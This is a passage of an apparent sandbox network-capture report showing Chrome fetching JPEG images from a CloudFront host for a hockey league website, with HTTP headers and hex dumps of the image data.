                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: a4 1e b8 eb 44 49 c1 ad 09 99 cd eb e2 12 f3 08 7d 23 3e 62 42 a9 b3 cb 24 ed f4 a8 dd 3a 97 a4 d8 e2 ba b9 b8 ca 31 b0 e9 52 d0 6d 0d be bf 36 4d c1 69 61 27 0a 57 4a 5c 6e 49 21 92 d4 00 24 ec 2a a9 a8 75 2b ad f3 47 82 b0 80 9d 8a f1 bf e1 5a 0c eb 36 9c 9a da c3 73 de 8e 14 76 21 5b 10 05 65 ba 9a c9 26 df 71 3f 10 b4 b8 ca cf ea 56 93 b1 4d 25 24 f6 41 45 72 4a a4 c9 51 7d f5 ad 7c c7 ef 2b bd 34 52 4e 73 8a 9d ba 7c 2b 68 43 71 d4 70 52 0e 0f ec 9f 6a 85 58 19 cf 35 32 22 38 f5 a7 96 96 11 22 e0 c3 0b 51 48 52 c0 c8 ed 4d 4e 31 90 73 4b 5b de 0c 4d 61 d5 0d 92 b0 4d 30 36 78 ab 4b 2d a1 be 7c 84 80 0f bd 48 b5 21 be 4c 85 0d bd ea 22 38 8c b6 d0 e2 19 1c ab 00 f5 a9 46 18 8c 52 9c 32 0e 37 c5 00 18 ba d9 df cc a4 1e 5b 4e 32 a6 d4 bd 94 08 3f 4a 7b
                                                                                                                          Data Ascii: DI}#>bB$:1Rm6Mia'WJ\nI!$*u+GZ6sv![e&q?VM%$AErJQ}|+4RNs|+hCqpRjX52"8"QHRMN1sK[MaM06xK-|H!L"8FR27[N2?J{
                                                                                                                          2025-01-13 21:01:21 UTC9200INData Raw: 38 44 c4 fe c8 52 87 5c ed 90 7f eb 8b bf 40 63 88 f2 9e d1 9a f2 2b 16 6d 71 05 3c b1 27 25 3c ad 4e 48 e8 0f ae 7f ea f4 ad ca 5e 7f af d7 99 e7 24 bc bf 5f af 23 9f c8 c5 19 0b 52 14 08 38 34 f6 fb 62 b9 e9 cb a3 f6 7b bc 55 c7 95 1d 5c ab 4a 87 f1 1e a0 fa d4 7d 36 44 ba e9 59 2e c8 29 86 a6 f9 da 5e ea 3b fc be f5 78 72 e4 a8 c8 1f ac 4a d2 06 32 91 d2 a0 f4 8b 91 22 e9 78 ca 92 e3 6d a9 f7 14 da 73 b1 27 3b 0a 46 43 8f 30 e2 8b 47 6c ef ef 55 a6 a4 4e 4a 85 6e d7 35 29 45 e6 d5 cd cb 80 7f 1a 6b aa 6e ad 5d 63 5b f4 ed 99 69 5c 99 45 2d ba 11 ee 7a 1a 41 29 56 1c 50 04 21 c1 83 fd 95 75 15 29 c1 5b 07 e9 6d 41 2e f9 29 1c cd c3 4f 22 09 e9 ce af 4f c0 1f ce a5 75 b9 1e 4d 1a d7 a7 1b b3 69 75 c2 48 dd a8 c5 09 fc 06 e7 f1 35 4e 0b db ee 9a d6 df 65
                                                                                                                          Data Ascii: 8DR\@c+mq<'%<NH^$_#R84b{U\J}6DY.)^;xrJ2"xms';FC0GlUNJn5)Ekn]c[i\E-zA)VP!u)[mA.)O"OuMiuH5Ne
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: ef ad 6f a1 84 c9 e7 51 51 53 6b 0a 04 9e f4 cc 69 8b eb 99 06 de b4 e3 f7 b0 05 04 c8 5a 8f 4d cc 72 13 c5 e6 5d 65 6a 42 82 54 46 e9 38 34 83 ba 82 fa b4 f9 6b 9f 23 1e 9e 65 25 ee 07 cd b1 e2 34 d3 10 c7 9d 77 98 da 00 df 91 2a de 9a 4f bc b6 19 30 ed ad 06 90 36 2b ee 45 47 3a b7 9f 25 6f ba a2 4f a9 cd 15 11 dd 73 66 9b 52 aa 57 e6 45 6f c0 30 9d 65 a9 68 76 42 79 90 93 92 3d 4d 16 5a c3 ef a9 e3 bf 39 ce 3d 3d a8 1c 68 b4 ae 43 8e 6e f8 ed 46 8b 1d 52 1d 08 1d 3a 93 ed 49 2b 76 0f 6d 8e 8d f0 2d c0 0b 97 1d 78 e7 a6 ac d3 60 ac e9 9b 74 a1 76 bc bc a4 fc 86 3b 04 2c b6 49 fd f5 04 a3 fb d5 25 f6 81 eb 69 9c 5e f1 2b 70 d4 16 b9 46 64 07 43 56 8b 1c 66 d0 a0 52 c3 2a 2d a4 24 11 83 ce b2 a5 0c 7e f5 75 d7 86 eb 4b 5e 1f bc 1a 6a 1e 27 1c 37 78 d6 6d
                                                                                                                          Data Ascii: oQQSkiZMr]ejBTF84k#e%4w*O06+EG:%oOsfRWEo0ehvBy=MZ9==hCnFR:I+vm-x`tv;,I%i^+pFdCVfR*-$~uK^j'7xm
                                                                                                                          2025-01-13 21:01:21 UTC12397INData Raw: 91 11 c0 51 e6 59 03 a9 1f 9d 57 3c 4f 36 bd 39 6e e1 cf 0c 6e 47 37 ad 23 a7 bc 8b 9f 28 25 08 75 d5 f3 06 d2 a2 30 b0 00 ea 32 29 eb f6 eb be 97 f0 91 a8 2c b7 26 dc 85 71 b7 f1 05 b8 d2 1b 0b c2 9b 71 31 c8 52 72 93 d8 8e c6 99 f8 88 96 e5 d7 86 3c 17 be cd 7d 52 66 49 d3 af b0 ec 97 15 cc b7 3c b7 40 09 52 8e e4 8d fa d6 5c d5 f4 67 14 aa 4a 31 bf 87 57 15 e0 ec ec e8 65 37 da b1 c8 e4 9e 37 9b 2f 4d 2d fa bb ab bb b6 9a 71 b4 92 4b 76 9d b2 ab 62 9d ac b8 cf 6b d1 3c 0e b1 59 98 22 cb 22 52 98 7d be 6c f2 be b0 b7 5d 7b 3f 2a 52 80 3a fa 56 ff 00 7a d5 d6 5d 55 78 e3 81 d3 92 c4 b8 76 2d 05 16 c6 dc c4 9d a4 16 15 ca b5 83 dc 15 12 33 dc 0a ad 70 eb 86 fc 45 8d e1 b5 9b a7 07 f4 e3 b7 0d 41 ae a5 c8 62 eb 70 61 c4 21 d8 96 e6 94 50 18 41 51 04 79 8a
                                                                                                                          Data Ascii: QYW<O69nnG7#(%u02),&qq1Rr<}RfI<@R\gJ1We77/M-qKvbk<Y""R}l]{?*R:Vz]Uxv-3pEAbpa!PAQy
                                                                                                                          2025-01-13 21:01:21 UTC8522INData Raw: 93 bd 7b 7a 01 3a e0 36 08 ef 46 07 6e b4 91 24 9a 1c 9c 6f 40 85 7a f7 a0 1b 0e b4 4c d0 e7 1d 68 00 14 92 52 b4 73 63 98 10 37 a8 fb 0c 49 f6 fb 6a 62 dc a4 f9 ee a1 c7 39 57 92 49 41 51 29 1b fa 0c 0a 90 27 3d a8 33 be f4 0d 3a 54 18 13 e9 5e ce f8 a2 e7 d2 bd 93 9a 00 3e e6 80 1e d4 4c af 18 c8 a1 a0 04 6e 13 7e 01 80 f7 92 b7 01 5a 50 42 06 48 c9 eb f4 a7 21 59 00 fa d1 4e 30 41 00 e7 b1 a0 e6 c0 d8 52 1f 80 7c e7 a8 a0 29 68 8f 99 b4 9f a8 a0 cd 06 49 eb 49 c5 3e 44 9b 5c 1e 2c 47 57 de 61 07 fb a2 90 72 0c 43 93 e4 27 f8 8a 71 cd 83 5e ce d5 4c b4 b8 27 ed 41 3f 92 26 b2 4d 70 d9 19 22 15 b1 a4 17 1f c3 49 1b 73 15 f2 81 f9 d2 4e d9 21 ac 6e 16 41 f7 cd 1f 52 59 cd f2 d1 22 da 97 10 da 9e 4e 02 94 33 83 eb 4e 63 b6 58 8e d3 05 45 5e 5a 12 8c 9e a7
                                                                                                                          Data Ascii: {z:6Fn$o@zLhRsc7Ijb9WIAQ)'=3:T^>Ln~ZPBH!YN0AR|)hII>D\,GWarC'q^L'A?&Mp"IsN!nARY"N3NcXE^Z


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          132192.168.11.204996254.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC437OUTGET /app/uploads/gthl/2024/11/06164616/AROUND-THE-G-TITLE-November-2024-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 85085
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Wed, 06 Nov 2024 21:46:17 GMT
                                                                                                                          ETag: "327091da5210694a7b476201aaae830f"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 65e185f36e65abff9322e261be3491d4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: ofyy_NLT8K7_05mAhlQkhroG1lRYweZgbJJ2eoA-iMlt6VzFMmV1gw==
                                                                                                                          2025-01-13 21:01:21 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 05 06 04 07 02 03 08 01 00 09 0a ff c4 00 5f 10 00 01 03 03 03 02 04 04 02 07 05 05 03 07 00 1b 01 02 03 04 00 05 11 06 12 21 07 31 13 41 51 61 08 14 22 71 32 81 15 23 42
                                                                                                                          Data Ascii: JFIF&&CC"_!1AQa"q2#B
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 5c 2e d7 1b 8b cf 4d 9e fa b0 ae 49 3f e5 4c 6d 36 4e 6c 7d c7 f4 8b 4b 7d 38 51 88 db 7b ea ca e3 b8 52 cc 74 1e 7b e6 84 1e ae be e2 4a 0b 49 56 47 f0 a4 59 0b 4c 85 95 63 6a 33 8c 9e e6 a3 16 0a 39 0a da 09 3d aa e0 04 f6 62 49 00 f5 1f 9a ea 3b ae 70 ee d4 8f 2c 9a 68 b1 eb 98 13 60 f8 0e be 84 ad 39 c7 3d fd ea 9f 8d 26 2b 27 12 5a ce 3b 1c 66 b3 9a f3 01 41 e8 03 20 8e 42 4f 6f ca ab 6a b4 ab a9 5f 2d fa 8e a2 f3 a7 6d ea 25 b7 79 7e df 78 b7 98 a8 6d 87 a5 3a b0 db 2b 24 65 b2 7f 6b 3e 58 ab 5a c2 cc 3b 3d 92 14 04 4e 12 14 c2 12 85 38 57 b8 a8 e3 93 9a e5 48 12 40 71 2e 29 e7 5b 57 1c a4 f6 a7 0b 4e af ba db 36 b6 5e 53 cd f7 04 9e 15 51 a4 a4 68 97 62 f3 27 51 67 ed 47 71 e2 5d d7 c8 e5 12 3c 74 8c 05 1e e2 a4 d9 ee 41 bc 30 f1 23 1d 89 a0 5a 63
                                                                                                                          Data Ascii: \.MI?Lm6Nl}K}8Q{Rt{JIVGYLcj39=bI;p,h`9=&+'Z;fA BOoj_-m%y~xm:+$ek>XZ;=N8WH@q.)[WN6^SQhb'QgGq]<tA0#Zc
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 04 30 c2 71 c7 95 41 90 cc 08 e9 2e ce 79 09 f5 dc aa 64 30 dc 79 1b 51 90 71 49 f7 bd 2e f1 79 6b 75 65 dd c9 23 62 f8 03 3e 62 a4 0c 99 24 90 bc 48 c2 eb 61 f1 76 c4 94 85 2b 3f b2 7b 53 1d a2 70 7c 6d 42 bb 7b d5 6f 0b 4a 49 b7 cd f1 de d8 b1 ce 13 ba ac 3d 0f 66 90 85 a5 72 f9 03 9e dd e8 d9 15 4f a4 c0 4b 19 86 48 85 e4 bc b6 53 97 09 1f 7a 5c 97 70 8e a7 09 53 dc 76 24 9a 78 d5 f6 c4 b9 08 7c b8 c2 82 73 c5 54 77 3b 74 b7 5a 96 ce d2 1c 38 f0 f0 70 4f ae 68 42 e5 b0 63 0b ed 5c 81 0c 98 16 c9 e0 a9 32 f7 ab b7 0b a1 b7 08 32 a1 a9 25 29 2b 6b 3c 7b 50 6d 3b a5 af 29 2e ba e7 8a 85 81 fa be 70 09 cf 9d 3b 42 b7 dc 43 01 89 c0 28 fa 8a 8b 6b 0b c0 91 5b 97 e4 8c 44 eb 80 75 05 68 f1 4a 43 88 c8 19 38 34 29 4e 18 56 d7 1b 07 24 ac 0a 7c ba 5a 10 98 85
                                                                                                                          Data Ascii: 0qA.yd0yQqI.ykue#b>b$Hav+?{Sp|mB{oJI=frOKHSz\pSv$x|sTw;tZ8pOhBc\22%)+k<{Pm;).p;BC(k[DuhJC84)NV$|Z
                                                                                                                          2025-01-13 21:01:21 UTC9811INData Raw: ef 7d 42 e9 73 1f 2e f4 40 72 f4 fb 76 30 0a 47 75 1d a9 4e 3f c4 85 0f da 15 43 7c 3b 75 b2 f7 d1 1d 7c f6 a7 65 0d c8 8a fa 15 02 e9 68 7d 5b 51 2a 31 3f 52 54 0f 65 03 c8 38 e0 e4 1e 09 a0 fd 29 d5 5d 49 e8 15 fa d9 ab 2c b3 d8 8b 73 8e a5 6e 43 44 a9 87 99 27 25 97 13 fb 49 23 bf e4 46 08 ae 87 d4 3a 6f e1 6f e2 ed f4 ea 36 75 03 5d 26 ea 3c 91 fe f6 c4 9c 0b 75 c1 d3 dd 40 92 13 92 7c c1 4a bd 42 bb d5 ae 49 07 a6 9c 8c aa a5 4f 2a 67 b2 b4 87 c1 0f 55 ee 4f 6a 9d 25 d6 29 3d 3a 98 f1 2a 93 67 b8 c6 dc c3 0b 3c a8 37 9c 00 33 e4 95 91 e8 07 6a 29 60 93 f0 7f f0 ff 00 29 3a e6 d7 ac a5 75 4f 55 c3 05 56 c6 90 d7 87 0a 3b de 4e 1e 36 e4 1f 32 54 47 90 cf 35 5c ea 0f ec ee f8 84 84 c9 6f 48 47 d3 b7 d8 ae 0c 37 2e 15 d5 09 4a 81 fd ac 39 b4 ff 00 5a 99
                                                                                                                          Data Ascii: }Bs.@rv0GuN?C|;u|eh}[Q*1?RTe8)]I,snCD'%I#F:oo6u]&<u@|JBIO*gUOj%)=:*g<73j)`):uOUV;N62TG5\oHG7.J9Z
                                                                                                                          2025-01-13 21:01:21 UTC11754INData Raw: 21 4f 12 93 94 92 39 07 d6 84 6b 19 72 6f 3f 08 3a 2a 75 c6 43 92 e4 5b f5 4c d8 6d 3a ea ca d6 d3 45 b2 af 0f 27 90 3b 71 f6 aa 44 01 a7 db 82 1b 61 fd 37 f5 8f 9f af f0 9e 82 b7 7b 3c 53 ce de ad 51 bd 3a 1c 96 3a 71 86 0d 92 36 fd 31 ff 00 e5 ed 2b eb 06 b0 d4 d7 5d 04 ae 88 d8 ac 68 99 fa 6a f8 cd c5 b5 34 14 64 38 f8 47 86 96 80 1c 14 f3 9a ea ad 17 2e 0d 8f ab 9d 3f e9 1b 33 5a 9b 71 d0 7a 32 e8 c5 ce 43 4a dc 96 e6 3a c9 5a da 4a bc f6 76 fc f1 55 9f c3 46 89 d5 68 e9 8e b0 ea 57 4e 2c 1f a5 b5 a0 90 dd 92 d0 41 40 54 04 2d 01 4f c8 4e f2 06 fd aa 00 1f 2f e3 5a fa 19 a3 f5 87 48 ba fb 65 6f ab 50 1c b1 c8 d4 d0 ae 11 a3 3d 35 f4 2b c5 79 d6 ca 42 94 a0 a3 dd 64 0c 9f 35 0a 9d 20 b2 af 2d 98 1c 31 1c fb 00 0f 03 3f 24 ff 00 be 60 78 e5 9a 4d 69 d5
                                                                                                                          Data Ascii: !O9kro?:*uC[Lm:E';qDa7{<SQ::q61+]hj4d8G.?3Zqz2CJ:ZJvUFhWN,A@T-ON/ZHeoP=5+yBd5 -1?$`xMi
                                                                                                                          2025-01-13 21:01:21 UTC15990INData Raw: 17 a7 13 85 4e 95 e1 a5 5f e0 40 ff 00 52 6b 98 d4 85 a0 e1 68 29 fb 8a ec ae 8c 59 cd af a6 16 56 96 a2 95 3c da a4 90 7f c4 a2 7f a6 29 c3 a3 02 52 df 11 37 85 cb d6 4d 5a 92 af d5 40 8e 9c 01 fb ca e4 9f e9 4c 3f 0c 56 f0 e4 9b cd cd 6c e1 21 0d b2 87 08 f3 c9 24 7f 4a af ba 81 e2 ea 9e a8 cf 8b 0c 95 2a 4c d1 19 bf 3e c4 26 ba 57 4b e9 c8 5a 22 c0 d5 b2 0b 61 2d b0 8d ce 2b cd 6b c7 24 fd cd 43 11 58 dc dd 42 e4 9c 09 ab 56 4b 26 42 22 a1 5f 80 6e 57 dc d0 04 b8 b5 1e 0d 6d 99 3c ca 92 e3 ae 8e 5c 56 7f 2a d7 84 8e 13 5f 33 f1 1d 48 d5 6a 1a cf d3 f0 9e b7 49 57 91 52 a4 9f 6a 6d 6f dc 19 6c 13 c2 b7 13 ec 2a bb ea cd 89 16 7d 5e dd c6 3b 41 2c 5c 13 e2 70 38 0b fd a1 fe 75 6b e9 78 f9 f1 a5 28 0c 60 24 7f 9d 50 dd 4c d6 ee 6a 3d 78 a8 51 96 55 06 dd
                                                                                                                          Data Ascii: N_@Rkh)YV<)R7MZ@L?Vl!$J*L>&WKZ"a-+k$CXBVK&B"_nWm<\V*_3HjIWRjmol*}^;A,\p8ukx(`$PLj=xQU
                                                                                                                          2025-01-13 21:01:22 UTC2010INData Raw: dd 3d 47 18 96 8c 54 05 9d c0 d4 e1 c7 7e 05 0a 83 20 78 69 56 7b 8a 20 a9 4d 96 b0 79 35 aa 04 cf 9a e4 2b 93 83 43 25 a7 7b 4a 4f b5 4b 5a f7 9e f8 a8 d2 4f d0 4f ad 74 99 5b ea eb 19 bc c8 89 6e 59 52 5b 72 62 3c 4c 7e e7 9d 3a cc d3 56 c6 a0 36 d4 47 bc 18 ed 20 25 08 40 18 00 54 19 48 0d cb 4b eb 09 09 1d ca b8 02 92 35 b7 56 62 c2 6d 76 9b 19 f1 de 1f 4a de cf d0 9f b7 ad 76 d0 79 92 0f b4 d1 a9 a5 d9 6d 2b 52 14 fa dd 73 d3 23 93 48 17 8b 82 2e 3f ab 7d c8 f1 d9 41 ca 52 3e b5 ff 00 2e d4 0e 6c e9 73 dd 54 89 4f 29 c5 28 e4 92 6b 40 52 7b 15 57 01 89 d9 cc 70 d0 fa f6 4e 80 99 25 fb 60 6a 43 72 90 10 b0 e2 08 23 1d 88 a1 77 7b 94 4d 43 74 93 75 ba dc 64 b9 22 4a ca ca bc 3e 07 b7 7e c2 82 12 08 e0 8c 56 49 42 b3 db 8a 9c 4e f7 84 95 a6 ca d9 4c 98
                                                                                                                          Data Ascii: =GT~ xiV{ My5+C%{JOKZOOt[nYR[rb<L~:V6G %@THK5VbmvJvym+Rs#H.?}AR>.lsTO)(k@R{WpN%`jCr#w{MCtud"J>~VIBNL
                                                                                                                          2025-01-13 21:01:22 UTC4560INData Raw: 83 f1 1e 52 16 3d fb fd ea c3 d3 7a 9a 3d d8 a6 2b ae 06 65 7e e9 38 0b fb 55 6a 5b c9 c7 ad 7a 85 2d a2 08 51 05 3c 82 3b 8a e0 01 91 2f 98 c9 79 00 15 1c e3 d6 a6 b2 a2 be ea c1 a4 0d 13 ae 42 d4 dd ae fc e6 01 fa 5b 92 7f fc 2f f5 ab 2d cb 63 ed 25 0b 5b 7f 42 c6 e4 ad 3c a5 43 d4 1e d4 24 6d e7 da 0e 61 bb 43 e5 6c 16 d5 9c 8e 2b 7b c8 c2 4e 68 35 ad e3 19 ff 00 09 c3 c2 bb 66 8f 2f 0b 03 1e 75 07 99 32 a7 ea 55 a6 e2 e4 84 4d 0a 4a a3 1c 25 60 f1 b5 23 93 cf 95 6c d2 dd 3d 85 73 6d ab 9d c6 07 83 09 03 7b 2c 9e 56 ef f8 94 7d 3d a9 d7 54 d9 8d ce d1 22 20 07 71 49 29 aa bd de aa ea 8b 33 7f a2 1e 87 19 4e 47 fd 58 5a 92 41 20 70 0e 2a bd 68 05 85 49 fa 89 61 98 9a c1 03 f1 8d 37 fb 54 a9 cd ae 15 af 48 c6 69 a7 12 1b 4c b7 76 82 d2 47 73 b7 c8 62 aa
                                                                                                                          Data Ascii: R=z=+e~8Uj[z-Q<;/yB[/-c%[B<C$maCl+{Nh5f/u2UMJ%`#l=sm{,V}=T" qI)3NGXZA p*hIa7THiLvGsb


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          133192.168.11.204996154.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC648OUTGET /app/uploads/gthl/2024/06/28105107/0C9A9391-730x487.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 117751
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Fri, 28 Jun 2024 14:51:09 GMT
                                                                                                                          ETag: "7629a9e02fdd4eb994af9913381dfb63"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 df08ba5d249ec7fb2513313ea66b59f8.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: e8KTvKvcoHliBYBMERC81v6Ni2_vHlSNXMmyZCyCKg6V3HWgvQUlRQ==
                                                                                                                          2025-01-13 21:01:21 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 f0 00 f0 00 00 ff e1 4a f4 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0a 00 0f 01 02 00 06 00 00 00 86 00 00 00 10 01 02 00 15 00 00 00 8c 00 00 00 1a 01 05 00 01 00 00 00 a2 00 00 00 1b 01 05 00 01 00 00 00 aa 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 20 00 00 00 b2 00 00 00 32 01 02 00 14 00 00 00 d2 00 00 00 3b 01 02 00 08 00 00 00 e6 00 00 00 98 82 02 00 09 00 00 00 ee 00 00 00 69 87 04 00 01 00 00 00 f8 00 00 00 64 03 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 56 00 00 f0 00 00 00 01 00 00 00 f0 00 00 00 01 00 00 00 41 64 6f 62 65 20 4c 69 67 68 74 72 6f 6f 6d 20 37 2e 33 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 30 36 3a 30 39 20 31 34 3a 34
                                                                                                                          Data Ascii: JFIFJExifII*(1 2;idCanonCanon EOS 5D Mark IVAdobe Lightroom 7.3 (Macintosh)2024:06:09 14:4
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: cc 4c 78 25 c5 bf 47 2b 26 68 f0 ed d5 e6 3e 72 ff 00 9c 73 b2 98 b5 c7 95 ae 7e a4 e0 55 74 cb 9a b4 1b 56 8b 1c a2 af 1d 7f ca f5 57 2e 9e 32 e3 42 41 e6 5f e1 ab 6b 7b 59 ec 2f 93 d3 bf 81 ca 5c 11 b9 46 56 2a db ff 00 c5 74 db f9 b2 12 c7 b7 9a 46 45 de 45 d7 b4 bd 03 cd 91 9d 42 40 f6 4e ad 6b 3c f0 37 21 1d 69 c6 65 2b d4 06 5f d9 fd 9c a4 61 27 76 e1 9c 02 f4 cf cc 6f 38 f9 5a 3d 32 d2 2f ad 9d 64 5d c9 1b b4 30 4b 1b 71 81 48 67 7a 80 14 33 d0 2a 72 f8 b2 32 c3 c4 cb 2e 5a 8e cc 97 c9 de 7e f2 8e b9 6f 1d b6 93 72 b1 49 1a 80 34 f9 69 1c ca 00 a5 02 9f b4 3f ca 4e 59 1f 0c c5 c0 36 c5 ff 00 33 2e 96 db ce 9a 14 ad b7 a5 25 b4 a0 f4 dc 4c ca 7f 03 99 fa 78 83 8a 57 f8 d9 90 99 aa 4f f5 13 69 a9 f9 86 ea eb 47 ba 59 a4 b4 11 43 a9 22 ef 1a ca 09 31
                                                                                                                          Data Ascii: Lx%G+&h>rs~UtVW.2BA_k{Y/\FV*tFEEB@Nk<7!ie+_a'vo8Z=2/d]0KqHgz3*r2.Z~orI4i?NY63.%LxWOiGYC"1
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 75 72 61 74 69 6f 6e 3d 22 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 53 68 61 64 6f 77 73 3d 22 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 44 61 72 6b 73 3d 22 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 4c 69 67 68 74 73 3d 22 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 48 69 67 68 6c 69 67 68 74 73 3d 22 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 53 68 61 64 6f 77 53 70 6c 69 74 3d 22 32 35 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 4d 69 64 74 6f 6e 65 53 70 6c 69 74 3d 22 35 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 48 69 67 68 6c 69 67 68 74 53 70 6c 69 74 3d 22 37 35 22 0a 20 20 20 63 72 73 3a 53 68 61 72 70 6e 65 73 73 3d 22 30 22 0a
                                                                                                                          Data Ascii: uration="0" crs:ParametricShadows="0" crs:ParametricDarks="0" crs:ParametricLights="0" crs:ParametricHighlights="0" crs:ParametricShadowSplit="25" crs:ParametricMidtoneSplit="50" crs:ParametricHighlightSplit="75" crs:Sharpness="0"
                                                                                                                          2025-01-13 21:01:21 UTC8424INData Raw: 6e 19 ba b4 9f 50 89 70 b0 4a 91 3b 04 23 95 a5 04 e3 9b 07 7f 0a 53 4e 89 22 e1 90 7a 54 12 1b 68 e5 1e f0 f8 d4 88 86 a0 61 65 99 20 89 e5 91 b9 51 14 b3 13 e0 05 00 67 93 71 6e 8f c4 1a ad cb e9 2d 35 e1 ee c4 72 a6 39 04 87 7e 50 a5 be 07 d3 eb 56 6d 69 72 26 89 cd 2a f2 db da 2c e2 4b 4b a0 60 f7 5d d9 c7 24 7c db ef 9c 78 ed d0 54 64 05 dd 0e 46 d5 49 30 93 9d a9 0c 92 d0 8f f5 9f 2a bf 17 e2 c6 c7 77 4d f6 ed 59 e7 f9 09 80 8d 42 22 43 ea 17 d0 d9 eb 96 f1 48 42 3d c0 ca b6 40 27 18 18 fc 7f 1a b1 2b 56 26 3f ba 3f 65 17 7d 39 e5 0f cd cc b8 50 71 be f4 20 25 a3 7c a8 3e 62 a6 99 31 40 d5 24 c0 3f 36 f5 2b 19 dc d4 ec 2c ac dc 45 65 67 7d 73 34 7a 3c b7 37 2d 2e 49 20 1c e7 c5 4b 1c 01 b6 f8 aa 9b e4 56 06 97 15 fc 3c 51 29 11 a2 58 bc 01 b1 e2 ac
                                                                                                                          Data Ascii: nPpJ;#SN"zThae Qgqn-5r9~PVmir&*,KK`]$|xTdFI0*wMYB"CHB=@'+V&??e}9Pq %|>b1@$?6+,Eeg}s4z<7-.I KV<Q)X
